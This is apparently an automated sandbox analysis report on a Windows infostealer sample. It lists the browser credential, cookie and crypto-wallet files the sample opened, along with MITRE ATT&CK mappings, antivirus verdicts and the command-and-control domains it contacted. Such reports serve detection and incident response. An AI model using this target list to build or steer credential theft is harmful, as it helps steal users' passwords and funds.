                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeDirectory queried: C:\Users\user\Documents\TTCBKWZYOCJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeDirectory queried: C:\Users\user\Documents\TTCBKWZYOCJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
Source: Yara match; file source: 00000000.00000003.3002739984.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000003.3020004985.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000003.3023883651.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000003.3024388435.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000003.2695354440.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: Process Memory Space: 6GNqkkKY0j.exe PID: 3500, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; file source: Process Memory Space: 6GNqkkKY0j.exe PID: 3500, type: MEMORYSTR
Source: Yara match; file source: sslproxydump.pcap, type: PCAP
Source: Yara match; file source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK tactics and techniques (where a number precedes a technique, it is the count of matching signatures):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
Execution: 12 Windows Management Instrumentation, 1 PowerShell, At, Cron, Launchd, Scheduled Task, Systemd Timers
Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Privilege Escalation: 1 Process Injection, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Defense Evasion: 44 Virtualization/Sandbox Evasion, 1 Process Injection, 1 Deobfuscate/Decode Files or Information, 3 Obfuscated Files or Information, 12 Software Packing, 1 DLL Side-Loading, Compile After Delivery
Credential Access: 2 OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
Discovery: 1 Query Registry, 851 Security Software Discovery, 44 Virtualization/Sandbox Evasion, 2 Process Discovery, 1 Application Window Discovery, 1 File and Directory Discovery, 223 System Information Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
Collection: 1 Archive Collected Data, 41 Data from Local System, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
Command and Control: 11 Encrypted Channel, 1 Ingress Tool Transfer, 3 Non-Application Layer Protocol, 114 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Service Stop, Inhibit System Recovery
Source | Detection | Scanner | Label
6GNqkkKY0j.exe | 53% | Virustotal |
6GNqkkKY0j.exe | 55% | ReversingLabs | Win32.Infostealer.Tinba
6GNqkkKY0j.exe | 100% | Avira | TR/Crypt.TPM.Gen
6GNqkkKY0j.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
https://lev-tolstoi.com/pi9 | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com:443/apizchhhv.default-release/key4.dbPK | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com: | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/ee | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/9 | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/4 | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/A | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/Q | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com/api4& | 100% | Avira URL Cloud | malware


Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.55.153.106 | true | false | | high
lev-tolstoi.com | 172.67.157.254 | true | false | | high
wordyfindy.lat | unknown | unknown | false | | high
slipperyloo.lat | unknown | unknown | true | | unknown
curverpluch.lat | unknown | unknown | true | | unknown
tentabatte.lat | unknown | unknown | true | | unknown
manyrestro.lat | unknown | unknown | true | | unknown
bashfulacid.lat | unknown | unknown | true | | unknown
shapestickyr.lat | unknown | unknown | true | | unknown
observerfry.lat | unknown | unknown | false | | high
talkynicer.lat | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
slipperyloo.lat | false | | high
observerfry.lat | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
https://lev-tolstoi.com/api | false | | high
curverpluch.lat | false | | high
tentabatte.lat | false | | high
manyrestro.lat | false | | high
bashfulacid.lat | false | | high
wordyfindy.lat | false | | high
shapestickyr.lat | false | | high
talkynicer.lat | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp; 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp; 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | 6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp; 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp; 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
